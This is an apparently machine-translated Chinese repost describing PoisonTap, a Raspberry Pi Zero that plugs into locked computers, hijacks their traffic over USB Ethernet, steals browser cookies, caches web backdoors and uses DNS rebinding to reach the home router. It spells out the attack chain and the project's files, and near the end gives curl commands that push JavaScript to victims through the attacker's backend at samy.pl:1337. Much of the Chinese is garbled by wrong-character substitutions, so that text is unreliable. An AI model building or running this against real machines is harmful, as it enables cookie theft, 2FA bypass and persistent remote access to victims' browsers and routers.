[embed]http://v.youku.com/v_show/id_XMTgyMjc3NDU2OA==.html[/embed]
poison Tap 绕过以下安全机制:
PoisonTap
PoisonTap是由 代价5$的Raspberry Pi Zero构建的,除了微型USB电缆和microSD卡之外不须要任何其它额外组件,但PoisonTap可以在其它可以仿照USB小部件(如USB Armory和LAN Turtle)的设备上事情。
(incredible HTML5 canvas animation by Ara) Video Demo: https://youtu.be/Aatp5gCskvk Point of Contact: @SamyKamkar // https://samy.pl Released: November 16, 2016 Source code and download: https://github.com/samyk/poisontapHow PoisonTap Works
PoisonTap通过利用机器和网络的各种机制(包括USB / Thunderbolt,DHCP,DNS和HTTP)中现有的信赖来产生级联效应,从而产生信息渗透,网络访问和半永久后门的安装的雪球效应。
简而言之,PoisonTap实行以下操作:
网络攻击
1.网络挟制攻击者将PoisonTap(例如武装强化的Raspberry Pi Zero)插入锁定的打算机(纵然打算机受密码保护) 2.PoisonTap仿照以太网设备(例如,USB / Thunderbolt) - 默认情形下,Windows,OS X和Linux识别以太网设备,自动将其作为低优先级网络设备加载并在其上实行DHCP要求,纵然机器被锁定或密码保护 3.PoisonTap相应DHCP要求并为机器供应IP地址,但是DHCP相应的目的是见告机器全体IPv4空间(0.0.0.0 - 255.255.255.255)是PoisonTap本地网络的一部分,而不是子网(如192.168.0.0 - 192.168.0.255)
常日,如果次要网络设备连接到机器,由于它将被给予比现有(受信赖)网络设备更低的优先级,并且不会取代用于因特网业务的网关,但是...任何路由表/网关优先级/网络接口做事顺序安全性由于“LAN流量”优先级超过“Internet流量”而被绕过PoisonTap利用此网络访问,乃至作为低优先级网络设备,由于低优先级网络设备的子网被给予比最高优先级网络设备的网关(默认路由)更高的优先级这意味着如果流量为1.2.3.4,而常日此流量将击中主网络设备(非PoisonTap)的默认路由/网关,PoisonTap实际上获取流量,由于PoisonTap“本地”网络/子网包含1.2 .3.4,以及每个其它IP地址存在;)因此,纵然机器连接到具有较高优先级和精确网关(真正的WiFi,以太网等)的另一个网络设备,所有的Internet流量也会经由PoisonTap抓取Cookie
1.只要Web浏览器正在运行后台,每打开一个页面,做事器后台都要进行http要求(例如加载新广告,将数据发送到剖析平台,或者只是连续跟踪您的网络运动)
你可以验证这一点,通过进入devtools / inspector(常日是Cmd + Shift + I或Ctrl + Shift + I),然后点击一个访问量很大的网站,点击网络选项卡,并不雅观察作为远程资源连续访问,纵然你在页面上没有采纳任何操作。2.根据此HTTP要求,由于所有流量都退出到PoisonTap设备,PoisonTap DNS欺骗即时返回其自己的地址,导致HTTP要求命中PoisonTap Web做事器(Node.js)
如果DNS做事器指向PoisonTap无法得到特权的内部IP(LAN),攻击连续有效,由于内部DNS做事器将为受攻击的各个域产生公共IP地址,并且它是PoisonTap的公共IP地址已经挟制一旦内部DNS做事器相应,Web浏览器将访问公共IP,终极在任一情形下访问PoisonTap Web做事器(Node.js)3.当Node web做事器吸收到要求时,PoisonTap会相应一个可以阐明为HTML或Javascript的相应,这两个都精确实行(许多网站将在后台要求中加载HTML或JS) 4.然后,HTML / JS-agnostic页面会天生许多隐蔽的iframe,每个iframe超过不同的Alexa-top-100万个域
域上的任何“X-Frame-Options”安全性都被绕过,由于PoisonTap现在是HTTP做事器,并选择发送到客户真个标头随着对网站的每个iframe HTTP要求(例如,http://nfl.com/PoisonTap),HTTP cookie从浏览器发送到PoisonTap挟制的“公共IP”,其迅速记录cookie /验证信息,将成千上万的用户的Cookie记录到PoisonTap任何“HttpOnly”cookie安全性被绕过,并且捕获这些cookie是由于没有Javascript在域本身上实行,而是仅用于首先加载iframe任何跨源资源共享或同源策略安全性被绕过,由于正在访问的域对浏览器显斧正当由于我们捕获的是Cookie而不是凭据,因此当攻击者利用Cookie登录时,将绕过在网站上履行的任何2FA / MFA。这是由于我们实际上不是实行登录功能,而是连续一个已经登录的会话,不会触发双成分身份验证如果做事器利用HTTPS,但Cookie未显式设置安全cookie标志,则绕过HTTPS保护,并将cookie发送到PoisonTap基于web后门的远程访问
1.虽然PoisonTap正在生产数千个iframe,迫使浏览器加载每个iframe,但这些iframe不仅仅是空缺页面,而是无限缓存的HTML + Javascript后门 2.即利用户当前未登录,由于PoisonTap在每个域上逼迫缓存这些后门,后门被绑定到该域,使攻击者能够利用域的Cookie并在将来启动同源要求,即利用户当前未登录
例如,当加载http://nfl.com/PoisonTap iframe时,PoisonTap通过Node Web做事器相应HTTP要求接管转向的Internet流量。添加了其它HTTP头以无限缓存页面3.页面的实际相应是HTML和Javascript的组合,其产生持续的WebSocket到攻击者的web做事器(通过因特网,而不是PoisonTap设备)
WebSocket保持打开状态,许可攻击者在将来的任何时候连接回后端机器,并在任何有后门实现的源上实行要求(Alexa排名前100万个网站 - 见下文)如果后门在一个站点(例如,nfl.com)上打开,但用户希望攻击不同的域(例如,pinterest.com),攻击者可以将nfl.com上的iframe加载到pinterest.com后门(http://pinterest.com/PoisonTap)。同样,域上的任何“X框架选项”,跨源资源共享和同源策略安全性完备被绕过,由于要求将命中PoisonTap离开的缓存,而不是真正的域[caption id=\公众attachment_92146\"大众 align=\"大众aligncenter\"大众 width=\公众628\"大众]
OLYMPUS DIGITAL CAMERA[/caption]
内部路由器后门和远程访问
1.PoisonTap不能挟制是真正的网络接口的实际LAN子网(例如,如果用户的wifi子网是192.168.0.x,这个网络不受影响),但... 2.PoisonTap在一个特殊主机上逼迫缓存后门,详细地,目标路由器的IP后面加上“.ip.samy.pl”,例如。 192.168.0.1.ip.samy.pl,基本上产生持久的DNS重绑定攻击
当利用PoisonTap作为DNS做事器(受害者利用公共DNS做事器)时,PoisonTap临时利用专门的PoisonTap IP(1.0.0.1)进行相应,这意味着此时的任何要求都将命中PoisonTap Web做事器如果期待DNS做事器设置内部网络(例如,192.168.0.x),我们对1.0.0.1.pin.ip.samy.pl做事器发出一个额外的特制要求,几秒之后,它会返回专用DNS做事器(公网的)的信息。然后,PoisonTap在http://192.168.0.1.ip.samy.pl/PoisonTap上快速设置一个后门,暂时指向1.0.0.1版本的PoisonTap设备,它许可后门从PoisonTap设备访问和存储3.DNS绑定和DNS重绑的安全性由于耗尽DNS绑定表而被绕过。由于之前做出的成千上万次的要求,DNS不须要重新绑定,使得该攻击可以持续很永劫光(感谢Matt Austin分享这种攻击思路!
) 4.现在,后门逼迫连接到http://192.168.0.1.ip.samy.pl/PoisonTap,任何对192.168.0.1.ip.samy.pl的要求都将命中非固定的IP地址,导致192.168.0.1 以解析,直接指向路由器 5.这意味着如果通过后门远程在iframe中加载192.168.0.1.ip.samy.pl/PoisonTap主机,你可以对内部路由器上的任何其他页面实行AJAX GET / POST,完备远程,从而许可远程访问内部路由器
Recap of the DNS server:
[ip.addy].ip.samy.pl normally responds with [ip.addy]192.168.0.1.ip.samy.pl -> 192.168.0.1 (A record)[ip.addy].pin.ip.samy.pl temporarily (~5 seconds) points .ip.samy.pl to [ip.addy]1.0.0.1.pin.ip.samy.pl -> 1.0.0.1192.168.0.1.ip.samy.pl -> 1.0.0.1 (A record, short TTL)(after ~5 seconds)192.168.0.1.ip.samy.pl -> 192.168.0.1 (A record)
基于web远程访问的其它后门
1.此外,PoisonTap替代了成千上万的常见的,基于CDN的Javascript文件,如谷歌和jQuery CDNs。在确定安全的代码加上一个后门,可以让攻击者访问任何域时加载受传染的基于CDN的Javascript文件 2.由于每个域上都留有后门,纵然当前受害者没有对当前域任何开放任何窗口,攻击者险些可以远程逼迫后端浏览器在任何主域上实行同源要求(AJAX GET / POST) 3.当受害者访问网站时,后门现在可以在任何额外的网站上利用这些受传染的,基于HTTP的CDN Javascript框架
安全预防posion Tap
做事端安全
如果你正在运行一个web做事器,以下是安全防御posion Tap的样例: 1.仅利用HTTPS,至少为认证和已认证的内容利用HTTPS 2.诚笃说,你该当单独利用HTTPS,并始终将HTTP内容重定向到HTTPS,防止用户通过HTTP提交被欺骗供应的凭据或其它PII 3.确保在Cookie上启用安全标记,防止通过HTTP泄露HTTPS Cookie 4.利用HSTS防止HTTPS降级攻击
桌面安全
1.拿粘合剂封住USB和Thunderbolt端口效果不错(与第3条类似,不过这里是物理封锁---
Code下载地址:
Source code: https://github.com/samyk/poisontap文件分解
在poisontap中有许多文件,它们用于不同的方面。 以下是文件列表:
ackdoor.html:每当一个http://hostname/PoisonTap URL命中exfiltrate cookies,这个文件是作为逼迫缓存的内容返回。它包含一个后门,天生一个出站websocket到samy.pl:1337(可调度到任何主机/端口),保持打开等待做事器的命令。当你在网站上加载iframe(如http://hostname/PoisonTap)时,这意味着这是被添补的内容(纵然PoisonTap从打算机中删除)。backend_server.js :这是你在Internet可访问的做事器上运行的Node.js做事器。 这是正是backdoor.html连接的内容(例如,samy.pl:1337)。 这是你连接到发送命令到你的PoisonTapped minion机器相同的做事器,例如# pop alert to victimcurl 'http://samy.pl:1337/exec?alert(\"大众muahahahaha\"大众)'# to set a cookie on victimcurl 'http://samy.pl:1337/exec?document.cookie=\"大众key=value\公众'# to force victim to load a url via ajax (note, jQuery is stored inside the backdoor)curl 'http://samy.pl:1337/exec?$.get(\"大众http://192.168.0.1.ip.samy.pl/login\公众,function(d)\{console.log(d)\})'pi_poisontap.js:它通过Raspberry Pi Zero上的Node.js运行,是PoisonTap是卖力截获的来自HTTP做事器的任何要求的,是存储Cookie和注入缓存的后门。pi_startup.sh:它在Raspberry Pi Zero上启动时运行,以便将设备设置为仿照USB以太网小配件,为我们设置恶意DHCP做事器,许可流量重走,DNS欺骗,并启动上面的pi_poisontap.js。target_backdoor.js: 此文件预先放在任何与CDN干系的Javascript文件中,从而将其封锁。target_injected_xhtmljs.html:这是在受害者的机器上注入无意/后台HTTP / AJAX要求并产生全体攻击的代码。它的布局办法使得它可以阐明为HTML或Javascript,并且仍旧实行相同的代码。poisontap.cookies.log: 一旦用户的打算机开始向PoisonTap发送HTTP要求,并且记录来自浏览器的cookie及其所属的干系URL /域,就会天生此文件。
